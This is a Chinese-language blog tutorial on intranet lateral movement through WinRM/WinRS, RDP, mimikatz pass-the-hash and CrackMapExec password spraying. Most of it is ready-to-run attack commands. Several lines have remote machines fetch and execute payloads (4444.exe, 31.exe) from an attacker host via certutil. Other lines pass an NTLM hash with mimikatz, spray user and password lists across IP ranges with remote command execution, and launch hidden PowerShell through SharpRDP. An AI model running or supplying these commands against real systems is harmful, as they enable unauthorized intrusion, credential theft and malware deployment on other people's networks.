首页 > 其他分享 >DAY180内网渗透之内网对抗:横向移动篇&WinRS命令&WinRM管理&RDP终端&密码喷射点&CrackMapExec

DAY180内网渗透之内网对抗:横向移动篇&WinRS命令&WinRM管理&RDP终端&密码喷射点&CrackMapExec

时间:2024-12-31 09:27:21浏览次数:3  
标签:exe RDP WinRM winrm 192.168 crackmapexec 4444 内网 smb

1. 内网横向移动

1、横向移动篇-协议服务-WinRS&WinRM&RDP

2、横向移动篇-工具项目-密码喷射

1.1 内网横向移动方法分类

基于口分

ipc smb wmi dcom winrs winrm rdp等

基于漏洞

域控提取漏洞 Exchange漏洞攻防

基于配置

委派 dysnc asrep kerberos攻击 ntlmreply

1.2 WinRM&WinRS

WinRM代表Windows远程管理,是一种允许管理员远程执行系统管理任务的服务。WinRS是内置的命令行工具,用于远程连接运行WinRM的服务器并执行大多数cmd命令

参考:横向移动之WinRM横向移动-腾讯云开发者社区-腾讯云

1.2.1 利用条件

1、win之前利用需要手动开启winRM ,在win之后包括win的版本是默认开启的,、防火墙对5986、5985端口开放。

开启命令:

winrm quickconfig -q 

winrm set winrm/config/Client '@{TrustedHosts="*"}'

1.2.1.1 探针可用

端口扫描5985 如果端口开启5985就可以利用WinRM,不过没有放弃这一个利用方式 思考SMB或者其他的

1.2.1.2 连接执行

连接执行:通过winrs来执行远程命令

winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 whoami

1.2.1.3 CS上线利用

如果端口开了,先使用ping 能ping通说明防火墙可能是关的,正向和反向都可以 如果是ping不通就是开的, 开的就要看winrm开没开开了可以使用icmp包装利用,没开winrm就不能利用

winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4444.exe 4444.exe & 4444.exe"

connect 192.168.3.32 4444

1.2.1.3.1 反向连接上线abcdefg

shell winrm invoke Create wmicimv2/win32_process @{CommandLine="cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/31.exe 31.exe & 31.exe"} -r:sqlserver -u:sqlserver\administrator -p:admin!@#45

1.2.1.4 CS内置模块

winrm winrm64

1.2.1.5 其他解决

通过winrm.cmd来进行命令执行

shell winrm invoke Create wmicimv2/win32_process @{CommandLine="cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4444.exe 4444.exe & 4444.exe"} -r:sqlserver -u:sqlserver\administrator -p:admin!@#45

这里关闭入站的协议规则

1.3 RDP

远程桌面服务 支持明文及HASH连接

条件:对方开启RDP服务 远程桌面

1.3.1 探针连接

端口扫描3389

tasklist /svc |find "TermService"# 找到对应服务进程的PID

netstat -ano | find “pid”

1.3.2 连接执行

明文连接:适用于Socks代理后

mstsc /console /v:192.168.3.32 /admin

端口转发

mimikatz(HASH连接)不推荐

mimikatz privilege::debug

mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c

SharpRDP(明文连接)不推荐

https://github.com/0xthirteen/SharpRDP

是一款可以不借助远程桌面GUI的情况下,通过RDP协议进行命令执行的程序。

SharpRDP.exe computername=192.168.3.32 command="powershell.exe -nop -w hidden -c\"IEX

1.3 CrackMapExec-密码喷射

1.3.1 手工去横向移动

、目标太多

、密码太多

、帐号太多

、协议太多

借助工具

Github:https://github.com/Porchetta-Industries/CrackMapExec

官方手册:https://www.crackmapexec.wiki/

使用案例:域渗透之CrackMapExec - Yangsir34 - 博客园

下载对应release,建立socks连接,设置socks代理,配置规则,调用!

1.3.2、Linux Proxychains使用

代理配置:Proxychains.conf

代理调用:Proxychains 命令

1.3.3、密码喷射-域用户登录PTH:

主要参数:-u用户,-p密码,-H哈希值,-d指定域,-x执行命令

主要功能:多协议探针,字典设置,本地及域喷射,命令回显执行等

proxychains4 crackmapexec smb 192.168.3.21-32 -u user.txt -H 518b98ad4178a53695dc997aa02d455c

#域用户HASH登录

proxychains4 crackmapexec smb 192.168.3.21-32 -u user.txt -p “admin!@#45” --local-auth #本地用户明文登录

proxychains4 crackmapexec smb 192.168.3.21-32 -u user.txt -p "admin\!@#45" --local-auth

proxychains4 crackmapexec smb 192.168.3.21-32 -u user.txt -p “admin\!@#45” --local-auth -x “whoami” #本地用户明文登录

proxychains4 crackmapexec smb 192.168.3.21-32 -u administrator  -H 518b98ad4178a53695dc997aa02d455c --local-auth

proxychains4 crackmapexec smb 192.168.3.21-32 -u administrator  -H 518b98ad4178a53695dc997aa02d455c --local-auth -x "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/31.exe 31.exe & 31.exe"

proxychains4 crackmapexec smb 192.168.3.21-32 -u user.txt  -p pass.txt --local-auth -x "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4444.exe 4444.exe & 4444.exe"

枚举计算机用户

proxychains4 crackmapexec smb 192.168.3.21-32 -u administrator  -H 518b98ad4178a53695dc997aa02d455c --local-auth --users

标签:exe,RDP,WinRM,winrm,192.168,crackmapexec,4444,内网,smb
From: https://blog.csdn.net/m0_74402888/article/details/144831650

相关文章

  • DAY179内网渗透之内网对抗:横向移动篇&入口切换&SMB共享&WMI管道&DCOM组件&Impacket套
    1.内网横向移动1、横向移动篇-协议服务-SMB2、横向移动篇-协议服务-命令模式、3、横向移动篇-协议服务-安全防御1.1WMI进行横向移动windows2012以上默认关闭了Wdigest,所以攻击者无法通过内存获取到明文密码为了针对以上情况所以有四种方法解决:1.利用(PTH,PTK)等进行......
  • Wordperss漏洞 DeDeCMS漏洞
    Wordperss漏洞环境搭建#执⾏命令cd/vulhub/wordpress/pwnscriptumdocker-composeup-d#靶场地址http://8.155.7.173:8080/wp-admin/注册账号登录漏洞一:后台修改模板拿WebShell步骤一:思路是修改其WP的模板写入⼀句话木马后门并访问其文件即可GetShell;登陆W......
  • WordPress安装子主题时长时间卡住
    网络连接不稳定:子主题的下载源可能位于海外服务器上,导致下载速度较慢或连接中断。建议您尝试更换网络环境,或者使用本地上传的方式将子主题文件上传到服务器后再进行安装。具体步骤如下:下载子主题压缩包到本地。登录FTP或通过服务器管理工具将压缩包上传到wp-content/themes......
  • 云服务器内网无法相互访问
    您好,关于您提到的云服务器内网无法相互访问的问题,我们已经进行了详细的排查和分析。根据您的描述,服务器在升级后出现了内网端口无法相互访问的情况,特别是127.0.0.1之间的通信出现问题,导致部分数据包丢失或无法正常连接特定端口(如2187)。此外,您还提到使用curl命令测试内网访问时遇到......
  • keepass实现google自输入_SSH_TELNET_RDP联动
    涉及到的是使用开源密码管理工具KeePass结合特定插件实现自动化密码填充的功能,特别是在谷歌浏览器中的应用。KeePass是一款强大的密码管理软件,它允许用户安全地存储各种账号的用户名和密码,并通过加密保护这些敏感信息。1.keepass安装及配置1.1程序下载地址下载、安......
  • 【安全工具】Cobalt Strike使用教程:内网渗透之信息收集篇
    一、前言二、内网信息收集篇2.1判断是否存在域2.2域内存活主机探测2.3域内基础信息收集2.4域内控制器的查找2.5定位域管理员工具2.5.1通过psloggedon.exe2.5.2通过PVEFindADUser.exe2.5.3通过PowerSploit的PowerVi......
  • 9.4-14域横向-CobaltStrike&SDN&RDP
    域横向RDP-mimikatz1、RDP明文密码链接2、RDP密文hash链接域横向SPN服务-探针,请求,导出,破解,重写SPN扫描当计算机加入域时,主SPN会自动添加到域的计算机账号的ServicePrincipalName属性中。在安装新的服务后,SPN也会被记录在计算机账号的相应属性中。SPN扫描也称为“扫描Kerber......
  • 9.5-10.9内网横向&代理&隧道
    Socks代理思路:工具:nps、frp、ngrok、reGeorg、sockscap64、earthworm、proxifier、proxychains知识点1、内外网简单知识2、内网1和内网2通信问题3、正向反向协议通信连接问题4、内网穿透代理隧道技术说明代理解决通信问题,隧道解决流量分析、流量监控工具、防火墙等告警内......
  • wordpress固定链接设置
     通过上面的测试发现,切换不同链接结构,同一张网页但是网址却发生了改变。为什么要改变网址的结构?主要原因,是为了搜索引擎优化。搜索引擎不喜欢带有问号的网址,也不喜欢层级特别深的网址。所以,WordPress允许你去设置网址的结构,让网址更符合搜索引擎的要求(官方说法是更美观)。%po......
  • Goby 漏洞发布|CVE-2024-9047 WordPress File Upload 插件 wfu_file_downloader.php 任
    漏洞名称:CVE-2024-9047WordPressFileUpload插件wfu_file_downloader.php任意文件读取漏洞EnglishName:CVE-2024-9047WordPressFileUploadPluginwfu_file_downloader.phpArbitraryFileReadVulnerabilitCVSScore:6.8漏洞描述:WordPressFileUpload插件是一款Wo......